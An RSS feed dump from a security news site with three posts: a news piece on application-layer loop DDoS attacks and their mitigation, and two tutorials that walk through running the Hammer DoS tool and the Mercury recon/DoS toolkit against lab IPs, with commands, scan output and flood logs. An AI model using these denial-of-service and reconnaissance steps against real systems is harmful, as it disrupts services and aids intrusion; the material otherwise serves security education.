Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ Information Security Newspaper|Infosec Articles|Hacking News Fri, 22 Mar 2024 00:02:13 +0000 en-US hourly 1 https://wordpress.org/?v=6.5.4 https://www.securitynewspaper.com/snews-up/2018/12/news5.png Information Security News|Cyber Security|Hacking Tutorial https://www.securitynewspaper.com/ 32 32 The Looping Attack: Application-Layer Loops as a New DDoS Attack Vector https://www.securitynewspaper.com/2024/03/21/the-looping-attack-application-layer-loops-as-a-new-ddos-attack-vector/ Fri, 22 Mar 2024 00:02:12 +0000 https://www.securitynewspaper.com/?p=27420 In the evolving landscape of cybersecurity threats, a new class of Distributed Denial of Service (DDoS) attacks has emerged, exploiting the intricate dance between network services. This phenomenon, known asRead More →

The post The Looping Attack: Application-Layer Loops as a New DDoS Attack Vector appeared first on Information Security Newspaper | Hacking News.

]]>
In the evolving landscape of cybersecurity threats, a new class of Distributed Denial of Service (DDoS) attacks has emerged, exploiting the intricate dance between network services. This phenomenon, known as application-layer loops, presents a sophisticated challenge that goes beyond traditional network-layer defenses. By manipulating two network services into an endless exchange of error messages, attackers can create a self-sustaining cycle of communication that puts undue stress on both the servers involved and the network infrastructure connecting them.

The Mechanism of Application-Layer Loops

Application-layer loops occur when two network services are configured to respond to each other’s messages indefinitely. A practical example of this vulnerability involves two DNS resolvers that, upon receiving an error message, reply with another error message. An attacker can exploit this by sending a single, IP-spoofed DNS error message to these resolvers, triggering an infinite loop of error messages between them. This not only burdens the servers but also saturates the network links between them, potentially leading to service degradation or outright failure.

This type of vulnerability has been identified in various implementations of TFTP, DNS, and NTP protocols, as well as in six UDP-based legacy protocols including QOTD, Chargen, and Echo, which have been vulnerable by design since their inception. The attack is possible due to a vulnerability, currently tracked as CVE-2024-2169, in the implementation of the UDP protocol, which is susceptible to IP spoofing and does not provide sufficient packet verification.

Scenarios of Exploitation

The exploitation of application-layer loops opens up several attack scenarios, each with its own set of challenges for cybersecurity defenses:

Scenario A: Direct Attack on a Loop Server
An attacker targets a loop server by creating multiple loops with other servers, concentrating the attack on a single point. This can exhaust the server’s bandwidth or computational resources. Patching the server to prevent loop patterns is a crucial defense strategy.

Scenario B: Straining the Network Backbone
By pairing hosts within a network’s backbone, attackers can generate millions of loops, aiming to overload the network infrastructure. Networks that implement ingress filtering for IP-spoofed traffic can mitigate such attacks from external sources.

Scenario C: Targeting Network Links
Attackers may also orchestrate loops to congest specific Internet links, including a network’s uplink or other critical paths. This strategy requires careful pairing of internal and external loop hosts to maximize stress on the targeted link.

Scenario D: Self-Amplifying Loops
In rare instances, loop servers respond with multiple messages, leading to self-amplifying loops. These loops not only persist indefinitely but also increase in intensity, posing a significant threat even when defensive measures cause packet loss.

The Scale of Vulnerability

The operator community faces a daunting challenge, with vulnerable servers identified across TFTP (~23k hosts), DNS (~63k), NTP (~89k), Echo/RFC862 (~56k), Chargen/RFC864 (~22k), and QOTD/RFC865 (~21k). The widespread nature of these vulnerabilities, coupled with the difficulty in attributing the majority of these systems to specific products or software, complicates the mitigation process.

Action Items for Mitigation

To address this emerging threat, several action items have been proposed:

  • Notification of ASNs: Informing Autonomous System Numbers (ASNs) about systems within their networks that are susceptible to DoS attacks. Initiatives like Shadowserver’s one-time report to subscribed organizations are steps in the right direction.
  • Assistance in Disclosure: Facilitating the disclosure process with affected vendors and developers to identify and rectify vulnerable software products.
  • Preventive Measures: Updating or shutting down vulnerable services, restricting service access, and identifying responsible software or products are crucial steps in reducing the attack landscape.
  • Reactive Measures: Disrupting the loops through packet loss, employing Quality of Service (QoS) adjustments, rate limiting, and detecting loop patterns are effective strategies in mitigating ongoing attacks.

The discovery of application-layer loops as a potential vector for DDoS attacks underscores the complexity of modern cybersecurity challenges. Unlike network-layer loops, which can be mitigated with existing defenses like TTL hop limits, application-layer loops require a combination of proactive and reactive strategies to prevent exploitation. As cyber threats continue to evolve, the cybersecurity community must remain vigilant, fostering collaboration and innovation to protect critical infrastructure and ensure the integrity of digital services.

The post The Looping Attack: Application-Layer Loops as a New DDoS Attack Vector appeared first on Information Security Newspaper | Hacking News.

]]>
Use Hammer Tool To Test DOS And Put Down Your Server https://www.securitynewspaper.com/2020/09/14/use-hammer-tool-to-test-dos-and-put-down-your-server/ Mon, 14 Sep 2020 14:18:14 +0000 https://www.securitynewspaper.com/?p=21391 Introduction DOS (Denial of Service) is always in news. Today every company want to implement DDOS protection to protect servers from attack. As a cyber security researcher or ethical hacker,Read More →

The post Use Hammer Tool To Test DOS And Put Down Your Server appeared first on Information Security Newspaper | Hacking News.

]]>
Introduction

DOS (Denial of Service) is always in news. Today every company want to implement DDOS protection to protect servers from attack. As a cyber security researcher or ethical hacker, you should know on how to test DOS in lab environment. Today we will talk about one more such tool.

Now you can send huge traffic to any devices or website by using hammer tool. Hammer is a DoS tool, its a very simple tool to test DOS attack and compromise any server by sending the high traffic to the server due to which server will stop responding to client. For more DDOS tools refer this.

NOTE: Do not run these test on production systems, this is for for informational and educational purposes only

Environment

  • OS: Kali Linux 2020, 64 bit
  • Kernel-Version: 5.6.0

Installation steps

  • Use this command to clone the project
  • git clone https://github.com/cyweb/hammer
root@kali:/home/iicybersecurity# git clone https://github.com/cyweb/hammer
Cloning into 'hammer'...
remote: Enumerating objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), 4.87 KiB | 831.00 KiB/s, done.
  • Use cd command to enter into hammer directory
root@kali:/home/iicybersecurity# cd hammer/
root@kali:/home/iicybersecurity/hammer#
  • Next, use this command to find all the help options.
  • python3 hammer.py -h
hammer
hammer
  • Now, use this command to start DOS attack on target IP address.
  • python3 hammer.py -s 192.168.0.25
  • 192.168.0.25 is DVWA IP
Hammer tool on DVWA
Hammer tool on DVWA
  • Here keep it sending the packets to target server. Now, let’s check the traffic sent to target IP address by using Wireshark application.
  • After capturing the packets in the Wireshark. If we select a particular packet it will display the complete details about the packets in a plain text and the raw data. We can also see the sources and the destination of the packets, protocol type.

Conclusion

So we saw on how to perform a DOS attack on a particular server by sending huge traffic using different protocols. Hackers use this tool to perform DOS attack.

The post Use Hammer Tool To Test DOS And Put Down Your Server appeared first on Information Security Newspaper | Hacking News.

]]>
Hack any website with All in One Tool https://www.securitynewspaper.com/2019/01/01/hack-any-website-with-all-in-one-tool/ Tue, 01 Jan 2019 17:24:17 +0000 https://www.securitynewspaper.com/?p=13719 Internet is the hub of web applications. Many past developers has made numerous web applications to use internet more effectively. Internet has become more easy to use but complex toRead More →

The post Hack any website with All in One Tool appeared first on Information Security Newspaper | Hacking News.

]]>

Internet is the hub of web applications. Many past developers has made numerous web applications to use internet more effectively. Internet has become more easy to use but complex to handle. Because it show case the lots of vulnerabilities. For gathering vulnerabilities we need an information gathering tool. That’s why we use information gathering or network reconnaissance tools. These tools gives basic information about the target. So that information can be used to build another scenario to exploit the target, explain ethical hacking investigators. Here comes Mercury tool which is used in information gathering of the target.

According to ethical hacking researcher of International Institute of Cyber Security says Mercury comes in bundle of other information gathering tools that’s why while testing a web application you don’t need to install separate tools.

Mercury is the tool to collect information about the target. It comprises of various small tools which are used to gather information. For showing you we have tested this tool on Kali Linux.

  • Before installing this tool make sure you have selenium in your Kali Linux. For that type sudo apt-get update
  • Type sudo apt-get install selenium
  • Type git clone https://github.com/MetaChar/Mercury.git
  • Then type ls
  • Type cd Mercury
  • Type pip install -r requirements.txt
pip install -r requirements.txt
Requirement already satisfied: colorama in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 1))
Collecting hashlib (from -r requirements.txt (line 2))
Using cached https://files.pythonhosted.org/packages/74/bb/9003d081345e9f0451884146e9ea2cff6e4cc4deac9ffd4a9ee98b318a49/hashlib-20081119.zip
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "", line 1, in
File "/usr/lib/python2.7/dist-packages/setuptools/init.py", line 12, in
import setuptools.version
File "/usr/lib/python2.7/dist-packages/setuptools/version.py", line 1, in
import pkg_resources
File "/usr/lib/python2.7/dist-packages/pkg_resources/init.py", line 36, in
import email.parser
File "/usr/lib/python2.7/email/parser.py", line 12, in
from email.feedparser import FeedParser
File "/usr/lib/python2.7/email/feedparser.py", line 27, in
from email import message
File "/usr/lib/python2.7/email/message.py", line 16, in
import email.charset
File "/usr/lib/python2.7/email/charset.py", line 13, in
import email.base64mime
File "/usr/lib/python2.7/email/base64mime.py", line 40, in
from email.utils import fix_eols
File "/usr/lib/python2.7/email/utils.py", line 27, in
import random
File "/usr/lib/python2.7/random.py", line 49, in
import hashlib as _hashlib
File "hashlib.py", line 115, in
f()
TypeError: 'frozenset' object is not callable

----------------------------------------

Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-hK3fYS/hashlib/
  • The above command shows the error because some of the libraries are not inherited inside the code of the mercury.
  • But still some of the main features of the mercury which are used in information gathering can be used.
  • Type python Mercury.py
  • The above are the list of tools used in information gathering.

Checking Website Online/Offline :-

  • Type 5
  • Then type https://hack.me
Enter a choice  ~# 5
Enter a host name include https: https://www.hack.me
Attempt 1 at host: https://www.hack.me: online
Attempt 2 at host: https://www.hack.me: online
Attempt 3 at host: https://www.hack.me: online
Attempt 4 at host: https://www.hack.me: online
Attempt 5 at host: https://www.hack.me: online
  • The above command shows that target website is online. Mercury tries to ping on the target to showcase that the target is online.
  • The above is the basic method used in initial phase of information gathering.

Getting An IP address of the Target :-

  • Type 10
  • Type hack.me
Enter a choice  ~# 10
Enter a website url hack.me
74.50.111.244
  • The above command shows the IP address of the target.

Creating an Hash Value of the Word :-

  • Type 12
  • Then type testword or any word of your choice.
Enter a choice  ~# 12
Please Enter a Word/String To Hash: testword
97d7f037cc3360e21991849c0dff4985
  • The above command can be helpful to create an hash encode of target. The hash encode can be helpful to attack using other hacking activities.

Download Tools Using Mercury :-

  • There are many tools in mercury which you can download and use them in information gathering. Some of the tools do include in Kali Linux and some are the basic tools that can be used.
  • Type 13
Enter a choice  ~# 13
  • Then type any number of which you want to install the tool.
  • Type 6
    [0] Metasploit          [9] Aircrack
    [1] Mercury             [10] Wifite
    [2] Nmap                [11] Hammer
    [3] Lazy script         [12] Xerxes
    [4] fsociety            [13] XSStrike
    [5] Reaver              [14] Wpscan
    [6] InstaBrute          [15] Cupp
    [7] Cl0neMas3r          [16] Hydra
    [8] Sqlmap


    [100] Install All       [99] Exit submenu
Tools ~# 6
  • Then the tool will be downloaded and can be used in other hacking activities.

Use Mercury For DOS Attack :-

  • Type 23
  • Type 192.168.1.105 target IP address.
 Enter a choice  ~# 23
Enter an ip address: 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
Bytes Sent to 192.168.1.105
  • The above command is useful in DOS attack. DOS is the most popular attacks. This method can be used in other hacking activities.

Finding Admin Panel :-

  • Type 22
  • Then type www.hack.me
  • Type https
Enter a choice  ~# 22
Enter a site to scan just www: www.hack.me
Is the link https or https: https
https://www.hack.me/a
https://www.hack.me/dm
https://www.hack.me/in.
https://www.hack.me/php
https://www.hack.me/
https://www.hack.me/admin.
https://www.hack.me/html
https://www.hack.me/index.ph
https://www.hack.me/p
https://www.hack.me/login.php
https://www.hack.me/

  • The above command tries to find the admin panel of target. This method can be used in other hacking activities.
  • Mercury uses its own wordlist for creating an most common admin panel links.

Using NMAP in Mercury :-

  • Type 14
  • Type y if you have nmap install if not type n.
  • Then type 192.168.1.105
Enter a choice  ~# 14
Have you already installed nmap? y/n y
Enter an ip: 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 04:00 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:00
Completed NSE at 04:00, 0.00s elapsed
Initiating NSE at 04:00
Completed NSE at 04:00, 0.00s elapsed
Initiating ARP Ping Scan at 04:00
Scanning 192.168.1.105 [1 port]
Completed ARP Ping Scan at 04:00, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:00
Completed Parallel DNS resolution of 1 host. at 04:00, 0.09s elapsed
Initiating SYN Stealth Scan at 04:00
Scanning dvwa (192.168.1.105) [1000 ports]
Discovered open port 80/tcp on 192.168.1.105
Discovered open port 443/tcp on 192.168.1.105
Discovered open port 3306/tcp on 192.168.1.105
Discovered open port 21/tcp on 192.168.1.105
Discovered open port 22/tcp on 192.168.1.105
Completed SYN Stealth Scan at 04:00, 0.16s elapsed (1000 total ports)
Initiating Service scan at 04:00
Scanning 5 services on dvwa (192.168.1.105)
Completed Service scan at 04:01, 12.10s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against dvwa (192.168.1.105)
NSE: Script scanning 192.168.1.105.
Initiating NSE at 04:01
Completed NSE at 04:01, 1.58s elapsed
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Nmap scan report for dvwa (192.168.1.105)
Host is up (0.00100s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2c
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|http-favicon: Unknown favicon MD5: 69C728902A3F1DF75CF9EAC73BD55556 | http-methods: | Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|/ |_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 | http-title: Damn Vulnerable Web App (DVWA) - Login |_Requested resource was login.php 443/tcp open ssl/http Apache httpd 2.2.14 ((Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1) | http-cookie-flags: | /: | PHPSESSID: | httponly flag not set
|http-favicon: Unknown favicon MD5: 69C728902A3F1DF75CF9EAC73BD55556 | http-methods: | Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|/ |_http-server-header: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 | http-title: Damn Vulnerable Web App (DVWA) - Login |_Requested resource was login.php | ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE | Issuer: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: md5WithRSAEncryption | Not valid before: 2004-10-01T09:10:30 | Not valid after: 2010-09-30T09:10:30 | MD5: b181 18f6 1a4d cb51 df5e 189c 40dd 3280 |_SHA-1: c4c9 a1dc 528d 41ac 1988 f65d b62f 9ca9 22fb e711 |_ssl-date: 2018-12-31T09:01:11+00:00; +4s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_64_CBC_WITH_MD5 | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_IDEA_128_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:58:9E:B1 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Uptime guess: 0.049 days (since Mon Dec 31 02:50:06 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=198 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms dvwa (192.168.1.105)


NSE: Script Post-scanning.
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Initiating NSE at 04:01
Completed NSE at 04:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.90 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
  • The above command uses nmap and shows open ports, MAC address, OS and information what nmap normally shows.
  • The above information can be used in other hacking activities, say ethical hacking professors.

The post Hack any website with All in One Tool appeared first on Information Security Newspaper | Hacking News.

]]>